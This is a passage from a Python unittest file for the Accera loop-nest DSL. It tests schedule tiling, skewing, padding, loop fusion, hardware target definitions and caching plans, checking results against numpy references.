ii, jj, kk = schedule.tile({
i: 8,
j: 2,
k: 3
})
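# tile() is convenience shorthand for one split() per listed dimension;
# a rough equivalent of the call above (a sketch using the split API seen
# elsewhere in this file):
#   ii = schedule.split(i, 8)
#   jj = schedule.split(j, 2)
#   kk = schedule.split(k, 3)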
self.assertIsNotNone(ii)
self.assertIsNotNone(jj)
self.assertIsNotNone(kk)
self.assertEqual(schedule._indices, [i, ii, j, jj, k, kk])
self._verify_schedule(schedule, [A, B, C], "test_schedule_tile")
# tile a subset of the iteration space
schedule1 = nest.create_schedule()
iii, kkk = schedule1.tile({
i: 8,
k: 3
})
self.assertIsNotNone(iii)
self.assertIsNotNone(kkk)
self.assertEqual(schedule1._indices, [i, iii, j, k, kkk])
self._verify_schedule(schedule1, [A, B, C], "test_schedule_tile_subset")
def test_schedule_skew(self) -> None:
for N in [10, 224]: # input sizes
for K in [1, 3, 5]: # filter sizes
M = N - K + 1 # output size
A = Array(role=Array.Role.INPUT, shape=(N, ))
B = Array(role=Array.Role.INPUT, shape=(K, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, ))
nest = Nest(shape=(M, K))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i] += A[i + j] * B[j]
schedule = nest.create_schedule()
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + np.convolve(np.flip(B_test), A_test, "valid")]
}
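# the nest computes a cross-correlation of A with B; this equals a
# "valid"-mode convolution of A with the reversed filter, hence the
# np.flip in the reference computation above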
# Skew dimension i with respect to dimension j.
schedule.skew(i, j)
self._verify_schedule(schedule, [A, B, C], f"test_schedule_skew_i_j_{N}_{K}", correctness_check_values)
# Skew dimension j with respect to dimension i.
schedule1 = nest.create_schedule()
schedule1.skew(j, i)
self._verify_schedule(schedule1, [A, B, C], f"test_schedule_skew_j_i_{N}_{K}", correctness_check_values)
def test_schedule_skew_unrolling(self) -> None:
N = 10 # input size
K = 3 # filter size
M = N - K + 1 # output size = 8
A = Array(role=Array.Role.INPUT, shape=(N, ))
B = Array(role=Array.Role.INPUT, shape=(K, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, ))
nest = Nest(shape=(M, K))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i] += A[i + j] * B[j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + np.convolve(np.flip(B_test), A_test, "valid")]
}
# Skew dimension i with respect to dimension j, with unrolling.
schedule = nest.create_schedule()
schedule.skew(i, j, unroll_loops_smaller_than=3)
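# unroll_loops_smaller_than=3 presumably unrolls the skewed boundary
# (triangular) loops whose trip count is below 3, leaving the steady-state
# loop rolled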
self._verify_schedule(schedule, [A, B, C], "test_schedule_skew_i_j_with_unrolling", correctness_check_values)
# Skew dimension j with respect to dimension i, with unrolling.
schedule1 = nest.create_schedule()
schedule1.skew(j, i, unroll_loops_smaller_than=3)
self._verify_schedule(schedule1, [A, B, C], "test_schedule_skew_j_i_with_unrolling", correctness_check_values)
def test_schedule_pad(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
# Adds empty elements to the beginning of dimension i, j, k
schedule.pad(i, 2)
ii = schedule.split(i, 3) # (2 + 16) // 3
# should result in these loops for i, ii
# i: [2, 3:3), ii: [0, 1:1) <-- partial (front padding)
# i: [3: 18:3), ii: [0, 3:1) <-- full
schedule.pad(j, 3)
jj = schedule.split(j, 3) # (3 + 10) // 3
# should result in these loops for j, jj
# j: [3, 12:3), jj: [0, 3:3) <-- full (front padding == split size)
# j: [12, 13:3), jj: [0, 1:1) <-- partial (automatic back padding)
schedule.pad(k, 11)
kk = schedule.split(k, 4) # (11 + 11) // 4
# should result in these loops for k, kk
# k: [11, 12:1), kk: [0, 1: 1) <-- partial
# k: [12, 20:4), kk: [0: 4: 1) <-- full
# k: [20, 22:4), kk: [0: 2: 1) <-- partial (automatic back padding)
schedule.reorder(i, ii, k, j, jj, kk)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
self._verify_schedule(schedule, [A, B, C], "test_schedule_pad", correctness_check_values)
def test_convenience_syntax(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
package = Package()
package_name = "test_convenience_syntax"
package.add(schedule, args=(A, B, C), base_name="plan_test")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
class DSLTest_04Fusing(unittest.TestCase):
def _verify_schedule(self, schedule, args: Tuple[Array], package_name, correctness_check_values) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(schedule, args, base_name="fusing_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_full_iteration_space_fusing(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 16))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1
nest1 = Nest(shape=(16, 16))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
schedule.reorder(i, j, f)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, (C_test + A_test) * B_test]
}
self._verify_schedule(schedule, (A, B, C), "test_full_iteration_space_fusing1", correctness_check_values)
# computing the output block-by-block:
# first computing C[0:4, 0:4] += A[0:4, 0:4]
# then computing C[0:4, 0:4] *= B[0:4, 0:4]
ii, jj = schedule.tile({
i: 4,
j: 4
})
schedule.reorder(i, j, f, ii, jj)
self._verify_schedule(schedule, (A, B, C), "test_full_iteration_space_fusing2", correctness_check_values)
def test_partial_iteration_space_fusing_1(self) -> None:
from accera import fuse, Nest, max
from accera._lang_python._lang import Scalar
A = Array(role=Array.Role.INPUT, shape=(16, 11))
B = Array(role=Array.Role.INPUT, shape=(11, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 10))
# Fully-connected neural layer with activation: C = op(C + A @ B)
# Create nest0 and schedule0
nest0 = Nest(shape=(16, 10, 11))
i0, j0, k0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, k0] * B[k0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1
nest1 = Nest(shape=(16, 10))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
# BUGBUG: should implicitly convert Scalar
C[i1, j1] = max(C[i1, j1], Scalar(0.))
schedule1 = nest1.create_schedule()
schedule = fuse((schedule0, schedule1), partial=2)
f, i, j, k = schedule.get_indices()
schedule.reorder(i, j, f, k)
# unfused indices (k) must not precede the fusing index (f)
with self.assertRaises(ValueError):
schedule.reorder(i, j, k, f)
self.assertEqual(schedule._indices, [i, j, f, k])
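# Expected fused loops (informal sketch): the unfused index k exists
# only in the f == 0 branch
# for i in range(16):
#     for j in range(10):
#         for f in range(2):
#             if f == 0:
#                 for k in range(11):
#                     C[i, j] += A[i, k] * B[k, j]
#             if f == 1:
#                 C[i, j] = max(C[i, j], 0.)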
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, np.maximum(C_test + A_test @ B_test, 0.)]
}
self._verify_schedule(schedule, (A, B, C), "test_partial_iteration_space_fusing_1", correctness_check_values)
def test_partial_iteration_space_fusing_2(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(4, ))
n0 = Nest([16])
i0 = n0.get_indices()
@n0.iteration_logic
def _():
A[i0] *= A[i0]
s0 = n0.create_schedule()
n1 = Nest([16, 4])
i1, j1 = n1.get_indices()
@n1.iteration_logic
def _():
B[j1] += A[i1]
s1 = n1.create_schedule()
fs = fuse((s0, s1), partial=1)
f, i, j = fs.get_indices()
jj = fs.split(j, 2)
fs.reorder(i, f, j, jj)
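# Expected fused loops (informal sketch): the unfused indices j, jj
# exist only in the f == 1 branch
# for i in range(16):
#     for f in range(2):
#         if f == 0:
#             A[i] *= A[i]
#         if f == 1:
#             for j in range(0, 4, 2):
#                 for jj in range(2):
#                     B[j + jj] += A[i]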
A_test_pre = np.random.random(A.shape).astype(np.float32)
B_test_pre = np.random.random(B.shape).astype(np.float32)
A_test_post = A_test_pre * A_test_pre
B_test_post = B_test_pre + np.sum(A_test_post)
correctness_check_values = {
"pre": [A_test_pre, B_test_pre],
"post": [A_test_post, B_test_post]
}
self._verify_schedule(fs, (A, B), "test_partial_iteration_space_fusing_2", correctness_check_values)
def test_unequal_iteration_space_fusing_1(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 16))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1 with a smaller iteration space size
nest1 = Nest(shape=(16, 10))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule: the smaller iteration space (nest1) should
# be automatically end-padded with no-ops
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
schedule.reorder(i, j, f)
# Emitted fused loop should look like:
# for i in range(0, 16):
# for j in range(0, 10):
# for f in range(2):
# if f == 0:
# C[i, j] += A[i, j]
# if f == 1:
# C[i, j] *= B[i, j]
# for j in range(10, 16):
# for f in range(2):
# if f == 0:
# C[i, j] += A[i, j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
C_ref = C_test + A_test # nest0
C_ref[:, :B.shape[1]] = C_ref[:, :B.shape[1]] * B_test # nest1
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._verify_schedule(schedule, (A, B, C), "test_unequal_iteration_space_fusing_1", correctness_check_values)
def test_unequal_iteration_space_fusing_2(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 10))
B = Array(role=Array.Role.INPUT, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 10))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1 with a larger iteration space size
nest1 = Nest(shape=(16, 16))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule: the smaller iteration space (nest0) should
# be automatically end-padded with no-ops
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
schedule.reorder(i, j, f)
# Emitted fused loop should look like:
# for i in range(0, 16):
# for j in range(0, 10):
# for f in range(2):
# if f == 0:
# C[i, j] += A[i, j]
# if f == 1:
# C[i, j] *= B[i, j]
# for j in range(10, 16):
# for f in range(2):
# if f == 1:
# C[i, j] *= B[i, j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
C_ref = np.copy(C_test)
C_ref[:, :A.shape[1]] = C_test[:, :A.shape[1]] + A_test # nest0
C_ref *= B_test # nest1
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._verify_schedule(schedule, (A, B, C), "test_unequal_iteration_space_fusing_2", correctness_check_values)
def test_unequal_iteration_space_fusing_3(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 16))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1 with a smaller iteration space size
nest1 = Nest(shape=(16, 10))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule: the smaller iteration space (nest1) should
# be automatically end-padded with no-ops
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
# computing the output block-by-block:
# first computing C[0:4, 0:4] += A[0:4, 0:4]
# then computing C[0:4, 0:4] *= B[0:4, 0:4]
ii, jj = schedule.tile({
i: 4,
j: 4
})
schedule.reorder(i, j, f, ii, jj)
# Emitted fused loop should look like:
# for i in range(0, 16, 4):
# # run both kernels in the smaller iteration spaces
# # (tiled block)
# for j in range(0, 8, 4):
# for f in range(2):
# if f == 0:
# for ii in range(0, 4):
# for jj in range(0, 4):
# C[i+ii, j+jj] += A[i+ii, j+jj]
# if f == 1:
# for ii in range(0, 4):
# for jj in range(0, 4):
# C[i+ii, j+jj] *= B[i+ii, j+jj]
#
# # run both kernels in the smaller iteration space
# # (boundary block for split)
# for j in range(8, 10): # range < split size
# for f in range(2):
# if f == 0:
# for ii in range(0, 4):
# C[i+ii, j] += A[i+ii, j]
# if f == 1:
# for ii in range(0, 4):
# C[i+ii, j] *= B[i+ii, j]
#
# # run kernel with the larger iteration space
# # (boundary block for split)
# for j in range(10, 16): # range < split size
# for f in range(2):
# if f == 0:
# for ii in range(0, 4):
# C[i+ii, j] += A[i+ii, j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
C_ref = C_test + A_test # nest0
C_ref[:, :B.shape[1]] = C_ref[:, :B.shape[1]] * B_test # nest1
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._verify_schedule(schedule, (A, B, C), "test_unequal_iteration_space_fusing_3", correctness_check_values)
def test_concat_fusing_1(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(3, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, ))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n1_i = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i] /= A[n1_i]
n2_i = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i] *= B[n2_i]
fused = fuse([n.create_schedule() for n in [n1, n2]], partial=0)
# Emitted fused loop should look like:
# for f in range(2):
# if f == 0:
# for i in range(3):
# A[i] /= A[i]
# if f == 1:
# for i in range(7):
# B[i] *= B[i]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
A_ref = A_test / A_test
B_ref = B_test * B_test
correctness_check_values = {
"pre": [A_test, B_test],
"post": [A_ref, B_ref]
}
self._verify_schedule(fused, (A, B), "test_concat_fusing_1", correctness_check_values)
@expectedFailure(FailedReason.BUG, "Concat fusing is broken")
def test_concat_fusing_2(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(11, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(5, ))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n3 = Nest(C.shape)
n1_i = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i] += A[n1_i]
n2_i = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i] *= B[n2_i]
n3_i = n3.get_indices()
@n3.iteration_logic
def _():
C[n3_i] /= C[n3_i]
fused = fuse([n.create_schedule() for n in [n1, n2, n3]], partial=0)
# Emitted fused loop should look like:
# for f in range(3):
# if f == 0:
# for i in range(11):
# A[i] += A[i]
# if f == 1:
# for i in range(7):
# B[i] *= B[i]
# if f == 2:
# for i in range(5):
# C[i] /= C[i]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
A_ref = A_test + A_test
B_ref = B_test * B_test
C_ref = C_test / C_test
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_ref, B_ref, C_ref]
}
self._verify_schedule(fused, (A, B, C), "test_concat_fusing_2", correctness_check_values)
def test_concat_fusing_3(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(3, 16))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, 16))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n1_i, n1_j = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i, n1_j] /= A[n1_i, n1_j]
n2_i, n2_j = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i, n2_j] *= B[n2_i, n2_j]
fused = fuse([n.create_schedule() for n in [n1, n2]], partial=0)
# Emitted fused loop should look like:
# for f in range(2):
# if f == 0:
# for i in range(3):
# for j in range(16):
# A[i,j] /= A[i,j]
# if f == 1:
# for i in range(7):
# for j in range(16):
# B[i,j] *= B[i,j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
A_ref = A_test / A_test
B_ref = B_test * B_test
correctness_check_values = {
"pre": [A_test, B_test],
"post": [A_ref, B_ref]
}
self._verify_schedule(fused, (A, B), "test_concat_fusing_3", correctness_check_values)
@expectedFailure(FailedReason.BUG, "Concat fusing is broken")
def test_concat_fusing_4(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(11, 16))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(5, 16))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n3 = Nest(C.shape)
n1_i, n1_j = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i, n1_j] += A[n1_i, n1_j]
n2_i, n2_j = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i, n2_j] *= B[n2_i, n2_j]
n3_i, n3_j = n3.get_indices()
@n3.iteration_logic
def _():
C[n3_i, n3_j] /= C[n3_i, n3_j]
fused = fuse([n.create_schedule() for n in [n1, n2, n3]], partial=0)
# Emitted fused loop should look like:
# for f in range(3):
# if f == 0:
# for i in range(11):
# for j in range(16):
# A[i,j] += A[i,j]
# if f == 1:
# for i in range(7):
# for j in range(16):
# B[i,j] *= B[i,j]
# if f == 2:
# for i in range(5):
# for j in range(16):
# C[i,j] /= C[i,j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
A_ref = A_test + A_test
B_ref = B_test * B_test
C_ref = C_test / C_test
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_ref, B_ref, C_ref]
}
self._verify_schedule(fused, (A, B, C), "test_concat_fusing_4", correctness_check_values)
@unittest.skip("BUG: Compilation takes too long")
def test_multi_concat_fusing_1(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 13, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 11, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 7, ))
D = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 3, ))
# Create nest0 and schedule
nest0 = Nest(A.shape)
i0 = nest0.get_indices()
@nest0.iteration_logic
def _():
A[i0] += A[i0]
# Create nest1 and schedule1
nest1 = Nest(B.shape)
i1 = nest1.get_indices()
@nest1.iteration_logic
def _():
B[i1] *= B[i1]
# Create a fused schedule
s0, s1 = [n.create_schedule() for n in [nest0, nest1]]
s0.split(i0, 11)
s1.split(i1, 5)
fused1 = fuse([s0, s1], partial=0)
nest2 = Nest(C.shape)
i2 = nest2.get_indices()
@nest2.iteration_logic
def _():
C[i2] *= C[i2]
s2 = nest2.create_schedule()
s2.split(i2, 13)
fused2 = fuse([fused1, s2], partial=0)
nest3 = Nest(D.shape)
i3 = nest3.get_indices()
@nest3.iteration_logic
def _():
D[i3] *= D[i3]
s3 = nest3.create_schedule()
s3.split(i3, 7)
fused3 = fuse([fused2, s3], partial=0)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
D_test = np.random.random(D.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test, D_test],
"post": [A_test + A_test, B_test * B_test, C_test * C_test, D_test * D_test]
}
self._verify_schedule(fused3, (A, B, C, D), "test_multi_concat_fusing_1", correctness_check_values)
class DSLTest_05Targets(unittest.TestCase):
def test_known_targets(self) -> None:
intel_name = "Intel 6400"
intel = Target(known_name=intel_name, num_threads=44)
self.assertEqual(intel.name, intel_name)
self.assertEqual(intel.num_threads, 44) # override
self.assertEqual(intel.vector_bytes, 32) # default
self.assertEqual(intel.vector_registers, 16) # default
self.assertEqual(intel.category, Target.Category.CPU) # default
pi3_name = "Raspberry Pi 3B"
pi3 = Target(Target.Model.RASPBERRY_PI_3B, category=Target.Category.CPU, frequency_GHz=1.2)
self.assertEqual(pi3.name, pi3_name)
self.assertEqual(pi3.num_threads, 8)
self.assertEqual(pi3.category, Target.Category.CPU)
def test_custom_targets(self) -> None:
my_target = Target(
name="Custom processor",
category=Target.Category.CPU,
architecture="x86_64",
family="Broadwell",
extensions=["MMX", "SSE", "SSE2", "SSE3", "SSSE3", "SSE4", "SSE4.1", "SSE4.2", "AVX", "AVX2", "FMA3"],
num_cores=22,
num_threads=44,
frequency_GHz=3.2,
turbo_frequency_GHz=3.8,
cache_sizes=[32, 256, 56320],
cache_lines=[64, 64, 64]
)
self.assertEqual(my_target.name, "Custom processor")
self.assertEqual(my_target.category, Target.Category.CPU)
self.assertEqual(my_target.architecture, "x86_64")
self.assertTrue("SSE3" in my_target.extensions)
def test_gpu_targets(self) -> None:
v100_name = "NVidia V100"
v100 = Target(Target.Model.NVIDIA_V100, category=Target.Category.GPU)
self.assertEqual(v100.name, v100_name)
self.assertEqual(v100.category, Target.Category.GPU)
self.assertEqual(v100.warp_size, 32)
mi100 = Target(Target.Model.AMD_MI100)
self.assertEqual(mi100.warp_size, 64)
self.assertEqual(mi100.frequency_GHz, 1.502)
a100 = Target(Target.Model.NVIDIA_A100)
self.assertEqual(a100.warp_size, 32)
class DSLTest_06PlansCaching(unittest.TestCase):
def _create_plan(self, shape: Tuple[int], type=ScalarType.float32) -> Tuple:
M, N, S = shape
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(
role=Array.Role.INPUT, element_type=type, shape=(S, N), layout=Array.Layout.LAST_MAJOR
) # use a different caching layout
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
plan = nest.create_plan()
return plan, [A, B, C], [i, j, k]
def _verify_plan(self, plan, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(plan, args, base_name="caching_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_caching_by_level(self) -> None:
plan, args, indices = self._create_plan((16, 10, 11))
A, B, C = args
_, j, _ = indices
AA = plan.cache(A, level=2)
self.assertEqual(AA.index, j)
# input, different layout
BB = plan.cache(B, level=2, layout=Array.Layout.FIRST_MAJOR)
self.assertEqual(BB.index, j)
self._verify_plan(plan, [A, B, C], "test_caching_by_level")
def test_caching_by_index(self) -> None:
plan, args, indices = self._create_plan((16, 10, 11))
A, B, C = args
_, j, _ = indices
with self.assertRaises(ValueError):
AA = plan.cache(A, index=j, level=1)
AA = plan.cache(A, index=j) # input
self.assertEqual(AA.index, j)
# input, different layout
BB = plan.cache(B, index=j, layout=Array.Layout.FIRST_MAJOR)
self.assertEqual(BB.index, j)
CC = plan.cache(C, index=j) # input/output
self.assertEqual(CC.index, j)
self._verify_plan(plan, [A, B, C], "test_caching_by_index")
def test_caching_by_element_budget(self) -> None:
plan, args, _ = self._create_plan((256, 10, 11))
A, B, C = args
AA = plan.cache(A, max_elements=1024)
self.assertEqual(AA.index, None)
self.assertEqual(AA.max_elements, 1024)
self._verify_plan(plan, [A, B, C], "test_caching_by_element_budget")
def test_thrifty_caching(self) -> None:
plan, args, indices = self._create_plan((16, 10, 11))
A, B, C = args
_, j, k = indices
# A is row-major, thrifty mode should skip caching
AA = plan.cache(A, thrifty=True, index=j)
self.assertIsNotNone(AA)
# B is column-major, thrifty mode should cache
BB = plan.cache(B, thrifty=True, index=k)
self.assertIsNotNone(BB)
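# Note (informal): thrifty caching is expected to elide the physical
# copy when the active block is already contiguous in the requested
# layout and to materialize it otherwise; both calls return a cache
# handle either way.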
self._verify_plan(plan, [A, B, C], "test_thrifty_caching")
@expectedFailure(FailedReason.NOT_IN_PY, "Various target memory identifiers")
def test_cache_mapping(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(1024, ))
nest = Nest(shape=(64, ))
i = nest.get_indices()
@nest.iteration_logic
def _():
A[i] += 2
v100 = Target(Target.Model.NVIDIA_V100, category=Target.Category.GPU, num_threads=16)
plan = nest.create_plan(v100)
plan.cache(i, type=v100.MemorySpace.SHARED)
self._verify_plan(plan, [A], "test_cache_mapping")
def test_cache_trigger_level(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(1024, 1024))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024, 1024))
nest = Nest(shape=(1024, 1024))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 128)
jj = schedule.split(j, 256)
schedule.reorder(i, j, ii, jj)
plan = schedule.create_plan()
plan.cache(A, index=ii, trigger_index=j)
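# Sketch of the intended structure (cached_A is an illustrative name
# for the generated cache buffer):
# for i in range(0, 1024, 128):
#     for j in range(0, 1024, 256):
#         # cache fill hoisted to trigger_index=j:
#         # cached_A = A[i:i+128, j:j+256]
#         for ii in range(128):
#             for jj in range(256):
#                 B[i + ii, j + jj] += cached_A[ii, jj]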
self._verify_plan(plan, [A, B], "test_cache_trigger_level")
def test_cache_trigger_level_matmul(self) -> None:
M = 1024
N = 1024
S = 1024
A = Array(role=Array.Role.INPUT, shape=(M, S))
B = Array(role=Array.Role.INPUT, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
jj = schedule.split(j, 128)
kk = schedule.split(k, 256)
kkk = schedule.split(kk, 4)
jjj = schedule.split(jj, 16)
jjjj = schedule.split(jjj, 8)
ii = schedule.split(i, 6)
schedule.reorder(j, k, i, jj, kk, kkk, ii, jjj, jjjj)
plan = schedule.create_plan()
plan.cache(B, index=kkk, trigger_index=k, layout=Array.Layout.FIRST_MAJOR)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
self._verify_plan(
plan, [A, B, C], "test_cache_trigger_level_matmul", correctness_check_values=correctness_check_values
)
def test_hierarchical_caching(self) -> None:
M = 1024
N = 1024
S = 1024
A = Array(role=Array.Role.INPUT, shape=(M, S))
B = Array(role=Array.Role.INPUT, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
